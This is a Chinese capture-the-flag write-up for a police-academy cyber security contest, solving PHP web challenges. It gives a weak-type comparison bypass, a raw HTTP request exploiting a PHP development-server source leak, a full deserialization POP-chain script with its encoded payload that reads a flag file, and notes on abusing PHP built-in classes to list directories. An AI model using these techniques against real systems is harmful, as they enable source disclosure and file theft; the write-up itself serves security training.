【黄河流域公安院校网络空间安全技能挑战赛】部分wp

其他
2025-08-19 20:57:02

文章目录 webbabyPHPfunnyPHPEzphp**遍历文件目录的类**1、DirectoryIterator：2、FilesystemIterator:3、**Globlterator** 读取文件内容的类：SplFileObject Misc套娃

web babyPHP <?php highlight_file(__FILE__); error_reporting(0); $num = $_GET['num']; if (preg_match("/\'|\"|\`| |<|>|?|\^|%|\$/", $num)) { die("nononno"); } if (eval("return ${num} != 2;") && $num == 0 && is_numeric($num) != true) { system('cat flag.php'); } else { echo '2'; }

仔细读题，主要考察php弱类型比较，我们可以直接传字母就行：

http://43.138.65.13:2025/?num=a funnyPHP

我们访问的路径为：

http://47.104.14.160:3344/hint.php

当我们访问根目录时：

可以判断这里为： php Development Server 启动的服务

查询得知，这里考察的是 PHP<=7.4.21 Development Server源码泄露漏洞

GET /puzzle.php HTTP/1.1 Host: pd.research \r\n \r\n GET / HTTP/1.1 \r\n \r\n

当我们以如上方式发送数据包时，我们可以获得 puzzle.php 的源码：

使用bp时要注意，我们要把自动填充 content-length关闭掉

源码如下：

<?php error_reporting(0); class A{ public $sdpc = ["welcome" => "yeah, something hidden."]; function __call($name, $arguments) { $this->$name[$name](); } } class B{ public $a; function __construct() { $this->a = new A(); } function __toString() { echo $this->a->sdpc["welcome"]; //对大家表示欢迎 } } class C{ public $b; protected $c; function __construct(){ $this->c = new B(); } function __destruct(){ $this->b ? $this->c->sdpc('welcom') : 'welcome!'.$this->c; //变着法欢迎大家 } } class Evil{ function getflag() { echo file_get_contents('/fl4g'); } } if(isset($_POST['sdpc'])) { unserialize($_POST['sdpc']); } else { serialize(new C()); } ?>

这是一个反序列化漏洞，我们可以如下构造：

<?php error_reporting(0); class A { public $sdpc; function __construct() { $this->sdpc = array("sdpc" => array(new Evil(),'getflag')); }//注意修改$sdpc的值为一个数组 //array('sdpc'=>array(new Evil(),'getflag')) function __call($name, $arguments) { $name[$name](); } } class B { public $a; function __construct() { $this->a = new A(); } function __toString() { echo $this->a->sdpc["welcome"]; //对大家表示欢迎 } } class C { public $b; protected $c; function __construct() { $this->c = new A(); //注意修改为创建A类对象 } function __destruct() { $this->b ? $this->c->sdpc('welcom') : 'welcome!' . $this->c; //给b赋值，触发 ___call } } class Evil { function getflag() { echo '1'; file_get_contents('/fl4g'); } } $ca = new A(); $cb = new B(); $cc = new C(); $cc->b = 'sp4c1ous'; echo urlencode(serialize($cc));

payload:

sdpc=O%3A1%3A%22C%22%3A2%3A%7Bs%3A1%3A%22b%22%3Bs%3A8%3A%22sp4c1ous%22%3Bs%3A4%3A%22%00%2A%00c%22%3BO%3A1%3A%22A%22%3A1%3A%7Bs%3A4%3A%22sdpc%22%3Ba%3A1%3A%7Bs%3A4%3A%22sdpc%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A4%3A%22Evil%22%3A0%3A%7B%7Di%3A1%3Bs%3A7%3A%22getflag%22%3B%7D%7D%7D%7D

这里有一个点：

<?php class Evil { function getflag() { echo '1'; } } print_r(array(new Evil(),'getflag')()); //输出： 1

array(new Evil(),'getflag')()

这样子相当于 Evil对象eval调用它的getflag()方法： eval::getflag()

这里不是很懂

Ezphp <?php error_reporting(0); highlight_file(__FILE__); $g = $_GET['g']; $t = $_GET['t']; echo new $g($t);

这个地方直接要我们创建对象，但是又没有自定义类，所以我们应该寻找php原生类

最初我想到的是 Error、Exception类，但是没什么用，可以用来执行xss漏洞

然后我找到了如下几个类：

遍历文件目录的类 DirectoryIteratorFilesystemIteratorGlobIterator 1、DirectoryIterator：

会创建一个指定目录的迭代器。当执行到echo函数时，会触发DirectoryIterator类中的 __toString() 方法，输出指定目录里面经过排序之后的第一个文件名

我们可以配合glob协议模式匹配来寻找我们想要的文件路径：